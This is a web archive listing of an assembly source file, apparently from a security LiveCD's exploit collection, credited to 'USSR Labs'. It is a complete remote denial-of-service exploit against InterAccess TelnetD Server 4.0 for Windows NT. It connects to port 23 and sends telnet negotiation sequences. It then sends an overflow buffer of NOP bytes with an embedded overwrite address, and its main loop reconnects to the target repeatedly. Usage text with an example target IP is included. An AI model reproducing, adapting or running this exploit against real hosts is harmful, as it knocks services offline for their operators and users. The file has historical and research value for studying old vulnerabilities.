home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / telnet / dostelnetdWin.zip.txt / MY.ASM

< prev

next >

Wrap

Assembly Source File  |  2000-02-24  |  9KB  |  411 lines

---

1. ; ****************************************************************************
2. ; * Redistribution and use in source and binary forms, with or without
3. ; * modification, are permitted provided that the following conditions
4. ; * are met:
5. ; * 1. Redistributions of source code must retain the above copyright
6. ; *    notice, this list of conditions and the following disclaimer.
7. ; * 2. Redistributions in binary form must reproduce the above copyright
8. ; *    notice, this list of conditions and the following disclaimer in the
9. ; *    documentation and/or other materials provided with the distribution.
10. ; *
11. ; * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
12. ; * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
13. ; * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
14. ; * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
15. ; * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
16. ; * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
17. ; * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
18. ; * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
19. ; * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
20. ; * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
21. ; * SUCH DAMAGE.
22. ; *
23. ; * www.ussrback.com
24. ; * Source by: USSR Labs
25. ; ***************************************************************************
26.  
27. .386p
28. locals
29. jumps
30. .model flat, stdcall
31.  
32. extrn    GetCommandLineA:PROC
33. extrn    GetStdHandle:PROC
34. extrn    WriteConsoleA:PROC
35. extrn    ExitProcess:PROC
36. extrn    WSAStartup:PROC
37. extrn    connect:PROC
38. extrn    send:PROC
39. extrn    recv:PROC
40. extrn    WSACleanup:PROC
41. extrn    htons:PROC
42. extrn    socket:PROC
43. extrn    inet_addr:PROC
44. extrn    closesocket:PROC
45. Extrn    GetModuleHandleA          : PROC
46. Extrn    GetProcAddress              : PROC
47. Extrn    lstrlenA              : PROC
48. Extrn    Sleep                  : PROC
49. .data
50.  
51.  
52. telnetInit01 db 0ffh,0fbh,018h
53. telnetInit02 db 0ffh,0fbh,020h
54. telnetInit03 db 0ffh,0fbh,023h
55. telnetInit04 db 0ffh,0fbh,024h
56. telnetInit05 db 0ffh,0fah,018h,01,076h,074h,031h,030h,030h,0ffh,0f0h
57. ;telnetInit05 db 0ffh,0fah,011h,00,011h,011h,011h,011h,011h,011h,011h
58. telnetInit05_length   equ     $-telnetInit05
59.  
60. telnetInit06 db 0ffh,0fdh,03h
61. telnetInit07 db 0ffh,0fbh,01h
62. telnetInit08 db 0ffh,0fch,1fh
63. telnetInit09 db 0ffh,0feh,05h
64. telnetInit10 db 0ffh,0fch,21h
65.  
66. telnetInit11 db 0ffh,0fch,01h
67. telnetInit12 db 0ffh,0fdh,01h
68.  
69. sploit_code label byte
70. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
71. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
72. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
73. DB 144,144,144,144,235,254,144,144,144,144,144,144,144,144,144,144,144,144,144,144
74. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
75. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
76. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
77. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
78. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
79. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
80. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
81. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
82. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
83. hola dd 0012f659h
84. sploit_code_length   equ     $-sploit_code
85.  
86. Copy      db "InterAccess TelnetD Server 4.0 for Windows NT Remote D.O.S *ALL BUILDS*", 13, 10
87.           db "by: U.s.s.R",13,10
88.           db "for source code or binary go to: http://www.ussrback.com/",13,10,13,10
89.           db "Usage: dietelnd HostIp", 13, 10
90.           db "Example: dietelnd 216.141.76.14",13,10,0
91. Copyl      equ $-Copy
92.  
93.  
94. contador dd 0
95. marquita dd 0
96. wsadescription_len equ 256
97. wsasys_status_len equ 128
98. hProv                dd 0
99. WSAdata struct
100. wVersion dw ?
101. wHighVersion dw ?
102. szDescription db wsadescription_len+1 dup (?)
103. szSystemStatus db wsasys_status_len+1 dup (?)
104. iMaxSockets dw ?
105. iMaxUdpDg dw ?
106. lpVendorInfo dw ?
107. WSAdata ends
108. lpde_ThreadId dd 0
109. sockaddr_in struct
110. sin_family dw ?
111. sin_port dw ?
112. sin_addr dd ?
113. sin_zero db 8 dup (0)
114. sockaddr_in ends
115. contadorthread dd 0
116. wsadata WSAdata
117. sin sockaddr_in
118. sock dd ?
119. numbase dd 10
120. hostParamether db 256 dup (?)
121. buffer dd 1000 dup (0)
122. buffer2 dd 1000 dup (0)
123.  
124. i_cant_connect    db 'fatal: sorry i can',27h,'t connect to this host!',13,10
125. i_cant_connectl equ $-i_cant_connect
126.  
127. SendingExploit  db 'ok!: Sending D.O.S To Host..',13,10
128. SendingExploitl equ $-SendingExploit
129.  
130. include code.inc
131.  
132. cchWritten dd 0
133. ConHandle dd 0
134.  
135. .code
136. start:
137.     xor    eax,eax
138.     xor    ebx,ebx
139.     xor    edx,edx
140.     xor    ecx,ecx
141.     xor    esi,esi
142.     xor    edi,edi
143.     xor    ebp,ebp
144.     Push    -11
145.     Call    GetStdHandle
146.     Mov    [ConHandle],EAX
147.     call    GetCommandLineA
148.     mov    edi, eax
149.     mov    ecx, -1
150.     xor    al, al
151.     push    edi
152.     repnz    scasb
153.     not    ecx
154.     pop    edi
155.     mov    al, 20h
156.     repnz    scasb
157.     dec    ecx
158.     mov    esi, edi
159.     cmp    byte ptr [esi],0
160.     je    no_command_line
161.     cmp    byte ptr [esi],20h
162.     je    incrementa1
163. continue:
164.     lea    edi, hostParamether
165.     rep    movsb
166. fuckyou:
167.     push    offset wsadata
168.     push    0101h
169.     call    WSAStartup
170.     xor    eax, eax
171.     push    eax
172.     inc    eax
173.     push    eax
174.     inc    eax
175.     push    eax
176.     call    socket
177.     mov    ebx,eax
178.     mov    sock, eax
179.     mov    sin.sin_family, 2
180.     mov    eax,23d               ; port
181.     push    eax
182.     call    htons
183.     mov    sin.sin_port, ax
184.     push    offset hostParamether
185.     call    inet_addr
186.     mov    sin.sin_addr, eax
187.     push    size sin
188.     push    offset sin
189.     push    ebx
190.     call    connect
191.     or    eax, eax
192.     je    connectionworking
193.     Write_Console <offset i_cant_connect > <i_cant_connectl >
194.     jmp    fuckyou
195. incrementa1:
196.     inc   si
197.     jmp   continue
198. connectionworking:
199.     pusha
200.     xor    eax,eax
201.     mov    edi, offset buffer
202.     mov    ecx,1000
203.     rep    stosb
204.     popa
205.     xor    eax, eax
206.     push    eax
207.     push    1000
208.     push    offset buffer
209.     push    sock
210.     call    recv
211.  
212.     xor    eax, eax
213.     push    eax
214.     push    3
215.     push    offset telnetInit01
216.     push    ebx
217.     call    send
218.  
219.     push    100
220.     call    Sleep
221.  
222.     xor    eax, eax
223.     push    eax
224.     push    3
225.     push    offset telnetInit02
226.     push    ebx
227.     call    send
228.  
229.     push    100
230.     call    Sleep
231.  
232.     xor    eax, eax
233.     push    eax
234.     push    3
235.     push    offset telnetInit03
236.     push    ebx
237.     call    send
238.  
239.  
240.     push    100
241.     call    Sleep
242.  
243.     xor    eax, eax
244.     push    eax
245.     push    3
246.     push    offset telnetInit04
247.     push    ebx
248.     call    send
249.  
250.  
251.     push    100
252.     call    Sleep
253.     pusha
254.     xor    eax,eax
255.     mov    edi, offset buffer
256.     mov    ecx,1000
257.     rep    stosb
258.     popa
259.     xor    eax, eax
260.     push    eax
261.     push    1000
262.     push    offset buffer
263.     push    sock
264.     call    recv
265.  
266.  
267.     push    100
268.     call    Sleep
269.     xor    eax, eax
270.     push    eax
271.         push    telnetInit05_length
272.     push    offset telnetInit05
273.     push    ebx
274.     call    send
275.  
276.  
277.     push    100
278.     call    Sleep
279.  
280.     xor    eax, eax
281.     push    eax
282.     push    03h
283.     push    offset telnetInit06
284.     push    ebx
285.     call    send
286.  
287.  
288.     push    100
289.     call    Sleep
290.     xor    eax, eax
291.     push    eax
292.     push    03h
293.     push    offset telnetInit07
294.     push    ebx
295.     call    send
296.  
297.     push    100
298.     call    Sleep
299.  
300.     xor    eax, eax
301.     push    eax
302.     push    03h
303.     push    offset telnetInit08
304.     push    ebx
305.     call    send
306.  
307.     push    100
308.     call    Sleep
309.  
310.     xor    eax, eax
311.     push    eax
312.     push    03h
313.     push    offset telnetInit09
314.     push    ebx
315.     call    send
316.  
317.  
318.     push    100
319.     call    Sleep
320.     xor    eax, eax
321.     push    eax
322.     push    03h
323.     push    offset telnetInit10
324.     push    ebx
325.     call    send
326.  
327.  
328.     push    100
329.     call    Sleep
330.     pusha
331.     xor    eax,eax
332.     mov    edi, offset buffer
333.     mov    ecx,1000
334.     rep    stosb
335.     popa
336.  
337.         Write_Console <offset SendingExploit > <SendingExploitl >
338.  
339.         push    sock
340.         call    closesocket
341.         call    WSACleanup
342.         jmp     fuckyou
343.  
344.         xor     eax, eax
345.     push    eax
346.     push    1000
347.     push    offset buffer
348.     push    sock
349.     call    recv
350.     push    offset buffer+8
351.     call    lstrlenA
352.     Write_Console <offset buffer+8    > <eax >
353.  
354.     push    100
355.     call    Sleep
356.     xor    eax, eax
357.     push    eax
358.     push    03h
359.     push    offset telnetInit11
360.     push    ebx
361.     call    send
362.  
363.     push    100
364.     call    Sleep
365.     xor    eax, eax
366.     push    eax
367.     push    03h
368.     push    offset telnetInit12
369.     push    ebx
370.     call    send
371.     Write_Console <offset SendingExploit > <SendingExploitl >
372.     xor    eax,eax
373.     mov    edi, offset buffer
374.     mov    ecx,1000
375.     rep    stosb
376.  
377.     push    100
378.     call    Sleep
379.     xor    eax, eax
380.     push    eax
381.     push    sploit_code_length
382.     push    offset sploit_code
383.     push    ebx
384.     call    send
385.  
386.     pusha
387.     xor    eax,eax
388.     mov    edi, offset buffer
389.     mov    ecx,1000
390.     rep    stosb
391.     popa
392.     xor    eax, eax
393.     push    eax
394.     push    1000
395.     push    offset buffer
396.     push    sock
397.     call    recv
398.  
399.     push    sock
400.     call    closesocket
401.     call    WSACleanup
402. final_exit:
403.     push    0
404.     call    ExitProcess
405. no_command_line:
406.     Write_Console <offset Copy > <Copyl >
407.     jmp   final_exit
408.  
409. end start
410.  
411.